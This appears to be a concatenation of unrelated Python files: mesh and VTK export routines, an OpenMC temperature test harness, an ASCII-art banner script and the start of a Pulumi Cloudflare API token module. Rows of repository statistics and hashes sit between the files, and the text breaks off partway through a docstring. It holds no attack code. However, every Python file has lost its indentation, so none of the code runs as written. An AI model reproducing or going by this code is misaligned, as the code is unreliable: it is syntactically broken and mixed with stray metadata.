def output_points(filename, rankNo, level, points, size):
with_vtk = False
triangles = []
#print("> output_points(filename={}, rankNo={}, level={}, n points: {}, size={})".format(filename, rankNo, level, len(points), size))
if with_vtk:
try:
# setup points and vertices
vtk_points = vtk.vtkPoints()
except:
pass
factor = 1.0
for p in points:
point = np.array([p[0], p[1], p[2]])
# add point to vtk data set
if with_vtk:
vtk_points.InsertNextPoint(p[0],p[1],p[2])
# add triangle to stl dataset
stl_create_rings.create_point_marker(point, triangles, size*factor)
#---------------------------------------
# Create the mesh
out_mesh = mesh.Mesh(np.zeros(len(triangles), dtype=mesh.Mesh.dtype))
for i, f in enumerate(triangles):
out_mesh.vectors[i] = f
#out_mesh.update_normals()
if level != -1:
if not os.path.exists("out/level_{}".format(level)):
os.makedirs("out/level_{}".format(level),0o755)
outfile = "out/level_{}/{}.{}.{}.stl".format(level, filename[0:2], rankNo, filename[2:])
else:
outfile = "{}.stl".format(filename)
#out_mesh.save(outfile, mode=stl.Mode.ASCII)
out_mesh.save(outfile)
print("saved {} triangles to \"{}\"".format(len(triangles),outfile))
if with_vtk:
try:
polydata = vtk.vtkPolyData()
polydata.SetPoints(vtk_points)
polydata.Modified()
writer = vtk.vtkXMLPolyDataWriter()
writer.SetFileName(outfile+".vtp")
writer.SetInputData(polydata)
writer.Write()
except:
print("writing vtp file {} failed".format(filename))
print("> output_points(filename={}, rankNo={}, level={}, n points: {}, size={}) done".format(filename, rankNo, level, len(points), size))
def output_streamline(filename, rankNo, level, points, size):
triangles = []
print("> output_streamline(filename={}, rankNo={}, level={}, n points: {}, size={})".format(filename, rankNo, level, len(points), size))
try:
# setup points and vertices
vtk_points = vtk.vtkPoints()
vtk_lines = vtk.vtkCellArray()
except:
pass
factor = 1.0
line_no = 0
previous_point = None
for p in points:
point = np.array([p[0], p[1], p[2]])
if np.linalg.norm(point) < 1e-3:
continue
if previous_point is not None:
triangles.append([previous_point, point, 0.5*(previous_point+point)])
try:
vtk_points.InsertNextPoint(previous_point[0], previous_point[1], previous_point[2])
vtk_points.InsertNextPoint(point[0], point[1], point[2])
vtk_line = vtk.vtkLine()
vtk_line.GetPointIds().SetId(0, 2*line_no + 0)
vtk_line.GetPointIds().SetId(1, 2*line_no + 1)
vtk_lines.InsertNextCell(vtk_line)
line_no += 1
except:
print("Error in creating vtk dataset in output_streamline({})".format(filename))
previous_point = point
stl_create_rings.create_point_marker(point, triangles, size*factor)
#factor *= 1.1
#if factor > 3:
# factor = 3.0
#---------------------------------------
# Create the mesh
out_mesh = mesh.Mesh(np.zeros(len(triangles), dtype=mesh.Mesh.dtype))
for i, f in enumerate(triangles):
out_mesh.vectors[i] = f
#out_mesh.update_normals()
if not os.path.exists("out/level_{}".format(level)):
os.makedirs("out/level_{}".format(level),0o755)
outfile = "out/level_{}/{}.{}.{}.stl".format(level, filename[0:2], rankNo, filename[2:])
#out_mesh.save(outfile, mode=stl.Mode.ASCII)
out_mesh.save(outfile)
print("saved {} triangles to \"{}\"".format(len(triangles),outfile))
try:
polydata = vtk.vtkPolyData()
polydata.SetPoints(vtk_points)
polydata.SetLines(vtk_lines)
polydata.Modified()
writer = vtk.vtkXMLPolyDataWriter()
writer.SetFileName(outfile+".vtp")
writer.SetInputData(polydata)
writer.Write()
except:
print("writing vtp file {} failed".format(filename))
print("> output_streamline(filename={}, rankNo={}, level={}, n points: {}, size={}) done".format(filename, rankNo, level, len(points), size))
def output_streamlines(filename, rankNo, level, streamlines, size):
triangles = []
try:
# setup points and vertices
vtk_points = vtk.vtkPoints()
vtk_lines = vtk.vtkCellArray()
except:
pass
factor = 1.0
line_no = 0
for points in streamlines:
previous_point = None
#print("output_streamlines, streamline: {}".format(points))
for p in points:
point = np.array([p[0], p[1], p[2]])
if np.linalg.norm(point) < 1e-3:
continue
if previous_point is not None:
triangles.append([previous_point, point, 0.5*(previous_point+point)])
try:
vtk_points.InsertNextPoint(previous_point[0], previous_point[1], previous_point[2])
vtk_points.InsertNextPoint(point[0], point[1], point[2])
vtk_line = vtk.vtkLine()
vtk_line.GetPointIds().SetId(0, 2*line_no + 0)
vtk_line.GetPointIds().SetId(1, 2*line_no + 1)
vtk_lines.InsertNextCell(vtk_line)
except:
print("Error in creating vtk dataset in output_streamlines({})".format(filename))
line_no += 1
previous_point = point
stl_create_rings.create_point_marker(point, triangles, size*factor)
#factor *= 1.1
#if factor > 3:
# factor = 3.0
#---------------------------------------
# Create the mesh
out_mesh = mesh.Mesh(np.zeros(len(triangles), dtype=mesh.Mesh.dtype))
for i, f in enumerate(triangles):
out_mesh.vectors[i] = f
#out_mesh.update_normals()
if not os.path.exists("out/level_{}".format(level)):
os.makedirs("out/level_{}".format(level),0o755)
outfile = "out/level_{}/{}.{}.{}.stl".format(level, filename[0:2], rankNo, filename[2:])
#out_mesh.save(outfile, mode=stl.Mode.ASCII)
out_mesh.save(outfile)
print("saved {} triangles to \"{}\"".format(len(triangles),outfile))
try:
polydata = vtk.vtkPolyData()
polydata.SetPoints(vtk_points)
polydata.SetLines(vtk_lines)
polydata.Modified()
writer = vtk.vtkXMLPolyDataWriter()
writer.SetFileName(outfile+".vtp")
writer.SetInputData(polydata)
writer.Write()
except:
print("writing vtp file {} failed".format(filename))
def output_rings(filename, rankNo, level, rings, size):
triangles = []
print("> output_rings(filename={}, rankNo={}, level={}, n rings: {}, size={})".format(filename, rankNo, level, len(rings), size))
# setup points and vertices
try:
vtk_points = vtk.vtkPoints()
vtk_lines = vtk.vtkCellArray()
except Exception as error:
print("Error in setup for output_rings {}: {}".format(filename, error))
factor = 1.0
line_no = 0
for points in rings:
previous_point = None
first_point = None
for p in points:
point = np.array([p[0], p[1], p[2]])
if np.linalg.norm(point) < 1e-3:
continue
if previous_point is None:
first_point = point
else:
triangles.append([previous_point, point, 0.5*(previous_point+point)])
try:
vtk_points.InsertNextPoint(previous_point[0], previous_point[1], previous_point[2])
vtk_points.InsertNextPoint(point[0], point[1], point[2])
vtk_line = vtk.vtkLine()
vtk_line.GetPointIds().SetId(0, 2*line_no+0)
vtk_line.GetPointIds().SetId(1, 2*line_no+1)
vtk_lines.InsertNextCell(vtk_line)
except Exception as error:
print("Error in creating vtk dataset in output_rings({}): {}".format(filename, error))
line_no += 1
previous_point = point
stl_create_rings.create_point_marker(point, triangles, size*factor)
#factor *= 1.1
#if factor > 3:
# factor = 3.0
# close loop (not for boundary points on faces)
if previous_point is not None:
triangles.append([previous_point, first_point, 0.5*(previous_point+first_point)])
try:
vtk_points.InsertNextPoint(previous_point[0], previous_point[1], previous_point[2])
vtk_points.InsertNextPoint(first_point[0], first_point[1], first_point[2])
vtk_line = vtk.vtkLine()
vtk_line.GetPointIds().SetId(0, 2*line_no+0)
vtk_line.GetPointIds().SetId(1, 2*line_no+1)
vtk_lines.InsertNextCell(vtk_line)
except Exception as error:
print("Error in creating vtk dataset in output_rings({}): {}".format(filename, error))
#---------------------------------------
# Create the mesh
out_mesh = mesh.Mesh(np.zeros(len(triangles), dtype=mesh.Mesh.dtype))
for i, f in enumerate(triangles):
out_mesh.vectors[i] = f
#out_mesh.update_normals()
print("output_rings({}, {}, {}, ...)".format(filename, rankNo, level))
if not os.path.exists("out/level_{}".format(level)):
print("path does not exist")
os.makedirs("out/level_{}".format(level),0o755)
print("path created")
outfile = "out/level_{}/{}.{}.{}.stl".format(level, filename[0:2], rankNo, filename[2:])
#out_mesh.save(outfile, mode=stl.Mode.ASCII)
out_mesh.save(outfile)
print("saved {} triangles to \"{}\"".format(len(triangles),outfile))
try:
polydata = vtk.vtkPolyData()
polydata.SetPoints(vtk_points)
polydata.SetLines(vtk_lines)
polydata.Modified()
writer = vtk.vtkXMLPolyDataWriter()
writer.SetFileName(outfile+".vtp")
writer.SetInputData(polydata)
writer.Write()
except Exception as error:
print("writing vtp file {} failed: {}".format(filename, error))
print("> output_rings(filename={}, rankNo={}, n rings: {}, size={}) done".format(filename, rankNo, level, len(rings), size))
def output_boundary_points(filename, rankNo, level, points, size):
triangles = []
print("> output_boundary_points(filename={}, rankNo={}, level={}, n points: {}, size={})".format(filename, rankNo, level, len(points), size))
try:
# setup points and vertices
vtk_points = vtk.vtkPoints()
vtk_lines = vtk.vtkCellArray()
except Exception as error:
print("Error in setup for output_boundary_points, {}: {}".format(filename, error))
# data structure:
# std::array<std::vector<std::vector<Vec3>>,4>
# list [<face0>, <face1>, <face2>, <face3>]
# <face> = [<level0>, <level1>, ...]
# <level> = [<point0>, <point1>, ...]
factor = 1.0
line_no = 0
for face_points in points:
for zlevel_points in face_points:
previous_point = None
first_point = None
for p in zlevel_points:
point = np.array([p[0], p[1], p[2]])
if np.linalg.norm(point) < 1e-3:
continue
if previous_point is None:
first_point = point
else:
triangles.append([previous_point, point, 0.5*(previous_point+point)])
try:
id1 = vtk_points.InsertNextPoint(previous_point[0], previous_point[1], previous_point[2])
id2 = vtk_points.InsertNextPoint(point[0], point[1], point[2])
vtk_line = vtk.vtkLine()
vtk_line.GetPointIds().SetId(0, id1)
vtk_line.GetPointIds().SetId(1, id2)
vtk_lines.InsertNextCell(vtk_line)
line_no += 1
except Exception as error:
print("Error in creating vtk dataset in output_boundary_points({}): {}".format(filename, error))
previous_point = point
stl_create_rings.create_point_marker(point, triangles, size*factor)
#factor *= 1.1
#if factor > 3:
# factor = 3.0
# close loop (not for boundary points on faces)
#if previous_point is not None:
# triangles.append([previous_point, first_point, 0.5*(previous_point+first_point)])
#---------------------------------------
# Create the mesh
out_mesh = mesh.Mesh(np.zeros(len(triangles), dtype=mesh.Mesh.dtype))
for i, f in enumerate(triangles):
out_mesh.vectors[i] = f
#for j in range(3):
#print("set (",i,",",j,")=",f[j]," (=",stl_mesh.vectors[i][j],")"
#out_mesh.update_normals()
if not os.path.exists("out/level_{}".format(level)):
os.makedirs("out/level_{}".format(level),0o755)
outfile = "out/level_{}/{}.{}.{}.stl".format(level, filename[0:2], rankNo, filename[2:])
out_mesh.save(outfile)
print("saved {} triangles to \"{}\"".format(len(triangles),outfile))
try:
polydata = vtk.vtkPolyData()
polydata.SetPoints(vtk_points)
polydata.SetLines(vtk_lines)
polydata.Modified()
writer = vtk.vtkXMLPolyDataWriter()
writer.SetFileName(outfile+".vtp")
writer.SetInputData(polydata)
writer.Write()
except Exception as error:
print("writing vtp file {} failed: {}".format(filename, error))
print("> output_boundary_points(filename={}, rankNo={}, level={}, n points: {}, size={}) done".format(filename, rankNo, level, len(points), size))
def output_triangles(filename, triangles):
#---------------------------------------
# Create the mesh
out_mesh = mesh.Mesh(np.zeros(len(triangles), dtype=mesh.Mesh.dtype))
for i, f in enumerate(triangles):
out_mesh.vectors[i] = f
#out_mesh.update_normals()
outfile = "out/{}.stl".format(filename)
#out_mesh.save(outfile, mode=stl.Mode.ASCII)
out_mesh.save(outfile)
print("saved {} triangles to \"{}\"".format(len(triangles),outfile))
def output_ghost_elements(filename, rankNo, level, point_values, n_elements, size):
triangles = []
try:
# setup points and vertices
vtk_points = vtk.vtkPoints()
vtk_boxes = vtk.vtkCellArray()
except:
pass
n_points = (int)(len(point_values)/3)
n_nodes = [n_elements[0]+1, n_elements[1]+1, n_elements[2]+1]
#print("output_ghost_elements, filename {}, n_elements: {}, n points: {}, n_nodes: {}, n_points: {}".format(filename, n_elements, len(point_values), n_nodes, n_points))
#print("point_values: {}".format(point_values))
#print("n_points: {}".format(n_points))
#print("n_elements: {}".format(n_elements))
factor = 1.0
box_no = 0
for z in range(n_elements[2]):
for y in range(n_elements[1]):
for x in range(n_elements[0]):
p = list()
for k in range(2):
for j in range(2):
for i in range(2):
index = (z+k) * n_nodes[0]*n_nodes[1] + (y+j) * n_nodes[0] + (x+i)
#print("index: {}".format(index))
p0 = np.array([point_values[index], point_values[n_points+index], point_values[2*n_points+index]])
p.append(p0)
#print("x: {}, y: {}, z: {}, points: {}".format(x,y,z,p))
triangles += [
[p[0],p[3],p[1]],[p[0],p[2],p[3]], # bottom
[p[4],p[5],p[7]],[p[4],p[7],p[6]], # top
[p[0],p[1],p[5]],[p[0],p[5],p[4]], # front
[p[2],p[7],p[3]],[p[2],p[6],p[7]], # back
[p[2],p[0],p[4]],[p[2],p[4],p[6]], # left
[p[1],p[3],p[7]],[p[1],p[7],p[5]] # right
]
try:
for i in [0,1,3,2,4,5,7,6]:
point = p[i]
vtk_points.InsertNextPoint(point[0], point[1], point[2])
vtk_box = vtk.vtkLine()
for i in range(8):
vtk_box.GetPointIds().SetId(i, 8*box_no + i)
vtk_boxes.InsertNextCell(8)
except:
print("Error in creating vtk dataset in output_ghost_elements({})".format(filename))
box_no += 1
#---------------------------------------
# Create the mesh
out_mesh = mesh.Mesh(np.zeros(len(triangles), dtype=mesh.Mesh.dtype))
for i, f in enumerate(triangles):
out_mesh.vectors[i] = f
#out_mesh.update_normals()
if not os.path.exists("out/level_{}".format(level)):
os.makedirs("out/level_{}".format(level),0o755)
outfile = "out/level_{}/{}.{}.{}.stl".format(level, filename[0:2], rankNo, filename[2:])
#out_mesh.save(outfile, mode=stl.Mode.ASCII)
out_mesh.save(outfile)
print("saved {} triangles to \"{}\"".format(len(triangles),outfile))
try:
polydata = vtk.vtkPolyData()
polydata.SetPoints(vtk_points)
polydata.SetPolys(vtk_boxes)
polydata.Modified()
writer = vtk.vtkXMLPolyDataWriter()
writer.SetFileName(outfile+".vtp")
writer.SetInputData(polydata)
writer.Write()
except:
print("writing vtp file {} failed".format(filename))
| 33.343254 | 170 | 0.613329 | 2,191 | 16,805 | 4.571429 | 0.085349 | 0.053215 | 0.041733 | 0.023363 | 0.815994 | 0.798922 | 0.786442 | 0.771865 | 0.764277 | 0.720347 | 0 | 0.020091 | 0.215115 | 16,805 | 503 | 171 | 33.409543 | 0.739272 | 0.148646 | 0 | 0.770642 | 0 | 0 | 0.117928 | 0.033312 | 0 | 0 | 0 | 0 | 0 | 1 | 0.021407 | false | 0.012232 | 0.018349 | 0 | 0.039755 | 0.094801 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
6bcc55492a50685f3641155adb315913ac009c7f | 4,762 | py | Python | tests/regression_tests/mg_temperature/test.py | Hit-Weixg/openmc | c5f66a3af5c1a57087e330f7b870e89a82267e4b | [
"MIT"
] | 2 | 2016-01-10T13:14:35.000Z | 2019-05-05T10:18:12.000Z | tests/regression_tests/mg_temperature/test.py | mehmeturkmen/openmc | ffe0f0283a81d32759e4f877909bbb64d5ad0d3d | [
"MIT"
] | 9 | 2015-03-14T12:18:06.000Z | 2021-04-01T15:23:23.000Z | tests/regression_tests/mg_temperature/test.py | mehmeturkmen/openmc | ffe0f0283a81d32759e4f877909bbb64d5ad0d3d | [
"MIT"
] | 4 | 2017-07-31T21:03:25.000Z | 2020-03-22T20:54:48.000Z | import os
from tests.regression_tests.mg_temperature.build_2g import *
from tests.testing_harness import *
import shutil
class MgTemperatureTestHarness(TestHarness):
def execute_test(self):
"""Run OpenMC with the appropriate arguments and check the outputs."""
base_dir = os.getcwd()
overall_results = []
macro_xs = create_openmc_2mg_libs(names)
types = ('micro', 'micro',
'micro', 'micro',
'micro',
'macro', 'macro',
'macro', 'macro',
'macro')
temperatures = (300., 600., 900.,
520., 600.,
300., 600., 900.,
520., 600)
methods = 2 * (3 * ('nearest',) + 2 * ('interpolation',))
analyt_interp = 10 * [None]
analyt_interp[3] = (600. - 520.) / 300.
analyt_interp[8] = (600. - 520.) / 300.
try:
if (os.path.isdir("./temp")):
shutil.rmtree("./temp")
os.mkdir("temp")
os.chdir(os.path.join(base_dir, "temp"))
for cs, t, m, ai in zip(types, temperatures, methods, analyt_interp):
if (cs == 'macro'):
build_inf_model(['macro'], '../macro_2g.h5', t, m)
else:
build_inf_model(names, '../micro_2g.h5', t, m)
if not ai:
kanalyt = analytical_solution_2g_therm(macro_xs[t])
else:
kanalyt = analytical_solution_2g_therm(macro_xs[300],
macro_xs[600], ai)
self._run_openmc()
self._test_output_created()
string = "{}, method: {}, t: {}, {}kanalyt\n{:12.6E}\n"
results = string.format(cs, m, t, self._get_results(), kanalyt)
overall_results.append(results)
os.chdir(base_dir)
self._write_results("".join(overall_results))
self._compare_results()
finally:
os.chdir(base_dir)
shutil.copyfile("results_test.dat", "results_true.dat")
if (os.path.isdir("./temp")):
shutil.rmtree("./temp")
self._cleanup()
for f in ['micro_2g.h5', 'macro_2g.h5']:
if os.path.exists(f):
os.remove(f)
def update_results(self):
"""Update the results_true using the current version of OpenMC."""
base_dir = os.getcwd()
overall_results = []
macro_xs = create_openmc_2mg_libs(names)
types = ('micro', 'micro',
'micro', 'micro',
'micro',
'macro', 'macro',
'macro', 'macro',
'macro')
temperatures = (300., 600., 900.,
520., 600.,
300., 600., 900.,
520., 600)
methods = 2 * (3 * ('nearest',) + 2 * ('interpolation',))
analyt_interp = 10 * [None]
analyt_interp[3] = (600. - 520.) / 300.
analyt_interp[8] = (600. - 520.) / 300.
try:
if (os.path.isdir("./temp")):
shutil.rmtree("./temp")
os.mkdir("temp")
os.chdir(os.path.join(base_dir, "temp"))
for cs, t, m, ai in zip(types, temperatures, methods, analyt_interp):
if (cs == 'macro'):
build_inf_model(['macro'], '../macro_2g.h5', t, m)
else:
build_inf_model(names, '../micro_2g.h5', t, m)
if not ai:
kanalyt = analytical_solution_2g_therm(macro_xs[t])
else:
kanalyt = analytical_solution_2g_therm(macro_xs[300],
macro_xs[600], ai)
self._run_openmc()
self._test_output_created()
string = "{}, method: {}, t: {}, {}kanalyt\n{:12.6E}\n"
results = string.format(cs, m, t, self._get_results(), kanalyt)
overall_results.append(results)
os.chdir(base_dir)
self._write_results("".join(overall_results))
self._compare_results()
finally:
os.chdir(base_dir)
shutil.copyfile("results_test.dat", "results_true.dat")
if (os.path.isdir("./temp")):
shutil.rmtree("./temp")
self._cleanup()
for f in ['micro_2g.h5', 'macro_2g.h5']:
if os.path.exists(f):
os.remove(f)
def test_mg_temperature():
harness = MgTemperatureTestHarness('statepoint.200.h5')
harness.main()
| 40.700855 | 81 | 0.47522 | 494 | 4,762 | 4.376518 | 0.220648 | 0.046253 | 0.041628 | 0.037003 | 0.837188 | 0.837188 | 0.837188 | 0.837188 | 0.837188 | 0.837188 | 0 | 0.053137 | 0.387442 | 4,762 | 116 | 82 | 41.051724 | 0.688036 | 0.026249 | 0 | 0.907407 | 0 | 0 | 0.106572 | 0.009079 | 0 | 0 | 0 | 0 | 0 | 1 | 0.027778 | false | 0 | 0.037037 | 0 | 0.074074 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
6bf365e6773459a73b469bdc67b239886d5c9246 | 212 | py | Python | PolyscopeSDK/subpackages/__init__.py | AzmHmd/WSI_Data_Preparation | d08f2aee243f7aa1c3c7421e83343c47b99d1d6d | [
"MIT"
] | null | null | null | PolyscopeSDK/subpackages/__init__.py | AzmHmd/WSI_Data_Preparation | d08f2aee243f7aa1c3c7421e83343c47b99d1d6d | [
"MIT"
] | null | null | null | PolyscopeSDK/subpackages/__init__.py | AzmHmd/WSI_Data_Preparation | d08f2aee243f7aa1c3c7421e83343c47b99d1d6d | [
"MIT"
] | null | null | null | from subpackages import txt_to_df
from subpackages import cws_tile_annotations_to_wsi_polyscope
from subpackages import cws_tile_annotations_to_tile_polyscope
from subpackages import polyscope_dots_to_labels
| 42.4 | 63 | 0.90566 | 31 | 212 | 5.709677 | 0.419355 | 0.338983 | 0.474576 | 0.271186 | 0.463277 | 0.463277 | 0.463277 | 0 | 0 | 0 | 0 | 0 | 0.09434 | 212 | 4 | 64 | 53 | 0.921875 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
d40eb3b0bdd9d323ce8494ea1948acdf518e6b68 | 1,246 | py | Python | banner.py | maxine-mrx/helpcomunity | ba4d6041c4bae1574c9ce4c09f29d305b99cc2b0 | [
"MIT"
] | 3 | 2021-07-18T14:21:39.000Z | 2021-07-20T13:41:48.000Z | banner.py | maxine-mrx/helpcomunity | ba4d6041c4bae1574c9ce4c09f29d305b99cc2b0 | [
"MIT"
] | null | null | null | banner.py | maxine-mrx/helpcomunity | ba4d6041c4bae1574c9ce4c09f29d305b99cc2b0 | [
"MIT"
] | null | null | null | #!/usr/bin/env python3
#############################################
# Org: help comunity #
# Authors : DB and M4x1n3 #
#############################################
from colors import white,blue,green,red
def banning(msg):
print('''{}
{}## # ### ###
{}# # # # {} ### #
{}# # # ## # # # # {} # # ## ## # # # # # ### #### # #
{}# ## # # # # ## # # {}# # # # # # # # ## # # # # #
{}# # # #### # # # # {}# # # # # # # # # # # # # #
{}# # # # # # # # {}# # # # # # # # # # # # ##
{}# # # # # # # # {} # # # # # # # ## # # # # ##
{}# # # ### # ### # {} ### ## # # # # # # # # ## # {} [help]{}comunity
{}### # ### {} V1.0 {} # {} Coded by {}
{} # {} # '''.format(blue,blue,blue,white,blue,white,blue,white,blue,white,
blue,white,blue,white,blue,white,white,blue,blue,red,white,green,msg,blue,white))
if __name__ == '__main__':
pass | 46.148148 | 139 | 0.207865 | 58 | 1,246 | 4.327586 | 0.534483 | 0.286853 | 0.310757 | 0.430279 | 0.250996 | 0.250996 | 0.250996 | 0.250996 | 0.250996 | 0.250996 | 0 | 0.009404 | 0.487961 | 1,246 | 27 | 140 | 46.148148 | 0.384013 | 0.072231 | 0 | 0 | 0 | 0.375 | 0.744722 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.0625 | false | 0.0625 | 0.0625 | 0 | 0.125 | 0.0625 | 0 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 7 |
d42d1a3bd7871d756464e94974cd4fdadb878f04 | 22,773 | py | Python | sdk/python/pulumi_cloudflare/api_token.py | pulumi/pulumi-cloudflare | d444af2fab6101b388a15cf2e3933e45e9935cc6 | [
"ECL-2.0",
"Apache-2.0"
] | 35 | 2019-03-14T21:29:29.000Z | 2022-03-30T00:00:59.000Z | sdk/python/pulumi_cloudflare/api_token.py | pulumi/pulumi-cloudflare | d444af2fab6101b388a15cf2e3933e45e9935cc6 | [
"ECL-2.0",
"Apache-2.0"
] | 128 | 2019-03-08T23:45:58.000Z | 2022-03-31T21:05:22.000Z | sdk/python/pulumi_cloudflare/api_token.py | pulumi/pulumi-cloudflare | d444af2fab6101b388a15cf2e3933e45e9935cc6 | [
"ECL-2.0",
"Apache-2.0"
] | 6 | 2019-05-10T12:52:56.000Z | 2020-03-24T15:02:14.000Z | # coding=utf-8
# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from . import _utilities
from . import outputs
from ._inputs import *
__all__ = ['ApiTokenArgs', 'ApiToken']
@pulumi.input_type
class ApiTokenArgs:
def __init__(__self__, *,
name: pulumi.Input[str],
policies: pulumi.Input[Sequence[pulumi.Input['ApiTokenPolicyArgs']]],
condition: Optional[pulumi.Input['ApiTokenConditionArgs']] = None):
"""
The set of arguments for constructing a ApiToken resource.
:param pulumi.Input[str] name: Name of the APIToken.
:param pulumi.Input[Sequence[pulumi.Input['ApiTokenPolicyArgs']]] policies: Permissions policy. Multiple policy blocks can be defined.
See the definition below.
:param pulumi.Input['ApiTokenConditionArgs'] condition: Condition block. See the definition below.
"""
pulumi.set(__self__, "name", name)
pulumi.set(__self__, "policies", policies)
if condition is not None:
pulumi.set(__self__, "condition", condition)
@property
@pulumi.getter
def name(self) -> pulumi.Input[str]:
"""
Name of the APIToken.
"""
return pulumi.get(self, "name")
@name.setter
def name(self, value: pulumi.Input[str]):
pulumi.set(self, "name", value)
@property
@pulumi.getter
def policies(self) -> pulumi.Input[Sequence[pulumi.Input['ApiTokenPolicyArgs']]]:
"""
Permissions policy. Multiple policy blocks can be defined.
See the definition below.
"""
return pulumi.get(self, "policies")
@policies.setter
def policies(self, value: pulumi.Input[Sequence[pulumi.Input['ApiTokenPolicyArgs']]]):
pulumi.set(self, "policies", value)
@property
@pulumi.getter
def condition(self) -> Optional[pulumi.Input['ApiTokenConditionArgs']]:
"""
Condition block. See the definition below.
"""
return pulumi.get(self, "condition")
@condition.setter
def condition(self, value: Optional[pulumi.Input['ApiTokenConditionArgs']]):
pulumi.set(self, "condition", value)
@pulumi.input_type
class _ApiTokenState:
def __init__(__self__, *,
condition: Optional[pulumi.Input['ApiTokenConditionArgs']] = None,
issued_on: Optional[pulumi.Input[str]] = None,
modified_on: Optional[pulumi.Input[str]] = None,
name: Optional[pulumi.Input[str]] = None,
policies: Optional[pulumi.Input[Sequence[pulumi.Input['ApiTokenPolicyArgs']]]] = None,
status: Optional[pulumi.Input[str]] = None,
value: Optional[pulumi.Input[str]] = None):
"""
Input properties used for looking up and filtering ApiToken resources.
:param pulumi.Input['ApiTokenConditionArgs'] condition: Condition block. See the definition below.
:param pulumi.Input[str] issued_on: The RFC3339 timestamp of when the API Token was issued.
:param pulumi.Input[str] modified_on: The RFC3339 timestamp of when the API Token was last modified.
:param pulumi.Input[str] name: Name of the APIToken.
:param pulumi.Input[Sequence[pulumi.Input['ApiTokenPolicyArgs']]] policies: Permissions policy. Multiple policy blocks can be defined.
See the definition below.
:param pulumi.Input[str] value: The value of the API Token.
"""
if condition is not None:
pulumi.set(__self__, "condition", condition)
if issued_on is not None:
pulumi.set(__self__, "issued_on", issued_on)
if modified_on is not None:
pulumi.set(__self__, "modified_on", modified_on)
if name is not None:
pulumi.set(__self__, "name", name)
if policies is not None:
pulumi.set(__self__, "policies", policies)
if status is not None:
pulumi.set(__self__, "status", status)
if value is not None:
pulumi.set(__self__, "value", value)
@property
@pulumi.getter
def condition(self) -> Optional[pulumi.Input['ApiTokenConditionArgs']]:
"""
Condition block. See the definition below.
"""
return pulumi.get(self, "condition")
@condition.setter
def condition(self, value: Optional[pulumi.Input['ApiTokenConditionArgs']]):
pulumi.set(self, "condition", value)
@property
@pulumi.getter(name="issuedOn")
def issued_on(self) -> Optional[pulumi.Input[str]]:
"""
The RFC3339 timestamp of when the API Token was issued.
"""
return pulumi.get(self, "issued_on")
@issued_on.setter
def issued_on(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "issued_on", value)
@property
@pulumi.getter(name="modifiedOn")
def modified_on(self) -> Optional[pulumi.Input[str]]:
"""
The RFC3339 timestamp of when the API Token was last modified.
"""
return pulumi.get(self, "modified_on")
@modified_on.setter
def modified_on(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "modified_on", value)
@property
@pulumi.getter
def name(self) -> Optional[pulumi.Input[str]]:
"""
Name of the APIToken.
"""
return pulumi.get(self, "name")
@name.setter
def name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "name", value)
@property
@pulumi.getter
def policies(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['ApiTokenPolicyArgs']]]]:
"""
Permissions policy. Multiple policy blocks can be defined.
See the definition below.
"""
return pulumi.get(self, "policies")
@policies.setter
def policies(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['ApiTokenPolicyArgs']]]]):
pulumi.set(self, "policies", value)
@property
@pulumi.getter
def status(self) -> Optional[pulumi.Input[str]]:
return pulumi.get(self, "status")
@status.setter
def status(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "status", value)
@property
@pulumi.getter
def value(self) -> Optional[pulumi.Input[str]]:
"""
The value of the API Token.
"""
return pulumi.get(self, "value")
@value.setter
def value(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "value", value)
class ApiToken(pulumi.CustomResource):
@overload
def __init__(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
condition: Optional[pulumi.Input[pulumi.InputType['ApiTokenConditionArgs']]] = None,
name: Optional[pulumi.Input[str]] = None,
policies: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['ApiTokenPolicyArgs']]]]] = None,
__props__=None):
"""
Provides a resource which manages Cloudflare API tokens.
Read more about permission groups and their applicable scopes in
[the official documentation](https://developers.cloudflare.com/api/tokens/create/permissions).
## Example Usage
### User Permissions
```python
import pulumi
import pulumi_cloudflare as cloudflare
all = cloudflare.get_api_token_permission_groups()
# Token allowed to create new tokens.
# Can only be used from specific ip range.
api_token_create = cloudflare.ApiToken("apiTokenCreate",
name="api_token_create",
policies=[cloudflare.ApiTokenPolicyArgs(
permission_groups=[all.permissions["API Tokens Write"]],
resources={
f"com.cloudflare.api.user.{var['user_id']}": "*",
},
)],
condition=cloudflare.ApiTokenConditionArgs(
request_ip=cloudflare.ApiTokenConditionRequestIpArgs(
